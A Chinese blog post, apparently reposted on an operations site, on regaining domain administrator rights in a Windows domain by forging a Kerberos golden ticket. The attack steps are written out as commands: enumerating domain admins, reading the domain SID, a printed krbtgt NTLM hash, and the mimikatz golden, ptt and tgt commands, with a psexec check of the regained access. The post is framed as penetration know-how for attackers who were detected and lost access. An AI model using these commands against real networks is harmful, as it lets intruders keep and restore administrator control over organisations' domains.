2个月前 (03-21)  渗透注入
文章评分 1 次,平均分 4.0

0x00 废话连篇


最近几年很少搞内网渗透了,这几年发展的快啊,看了A牛翻译的<<Fireeye Mandiant 2014 安全报告 Part1>> ,发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的,找朋友要些vbscript脚本自动化,然后那啥那啥的。现在搞域除了前段时间出的MS14068,还有龙哥翻译的(http://drops.wooyun.org/papers/576),不知道还有什么新方法,心中还有激情,如果想交流的朋友,可以加我聊聊。

0x01 金之钥匙


我原来发过一个微薄说

域渗透的金之钥匙 – mickey

这就是我说的金之钥匙,利用这个的条件是你在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候又忘记修改krbtgt密码了(很常见),我们还是能重新回来,步骤如下:

要重新拿回域管理员权限,首先要先知道域内的管理员有谁

C:\Users\hydra>net group "domain admins" /domain

我这里的实验环境,通过截图可以看到域管理员是administrator

我还要知道域SID是啥

C:\Users\hydra>whoami /user

我的域SID是 S-1-5-21-3883552807-251258116-2724407435

还有最重要的krbtgt用户的ntlm哈希,我原来导出的是

krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::

域渗透的金之钥匙 – mickey

然后该用神器mimikatz出场了,依次执行

mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt

域渗透的金之钥匙 – mickey

到现在,我们又重新拥有域管理员权限了,可以验证下

E:\&gt;net use \\WIN-0DKN2AS0T2G\c$
E:\&gt;psexec.exe \\WIN-0DKN2AS0T2G cmd

域渗透的金之钥匙 – mickey

0x02 后话闲扯


呃,感觉这个方法比http://drops.wooyun.org/tips/9297这个方便些,文章写了好久了,一直凑不出更多的字数,就没发。。嗯。。。懒了。。


//下面这个css和插件后台设置的主题有关系,如果需要换样式,则需要修改以下CSS名称

 

除特别注明外,本站所有文章均为铁匠运维网原创,转载请注明出处来自http://www.tiejiang.org/23526.html

中国互联是江苏邦宁科技有限公司旗下的著名IT服务供应商品牌之一,是国内IDC行业十大之一、企业互联网服务首选品牌。江苏邦宁科技成立于2003年,是国内互联网名称与数字地址服务、云数据中心机房服务的引领者,是行业云计算解决方案、网站智能建设、企业智能办公软件、移动互联网开发的创新者。自成立以来,公司秉承“一切为了客户满意”的核心理念,坚持“国际化、专业化、高端化”的发展思路,坚持“以客户需求为导向、以技术创新为基础、以服务创新为支撑”,先后为国内各级政府、社会服务机构、国内外众多500强企业及中小企业、个人客户提供了专业、高质、优越的互联网应用服务。

发表评论

暂无评论

切换注册

登录

忘记密码 ?

您也可以使用第三方帐号快捷登录

切换登录

注册

扫一扫二维码分享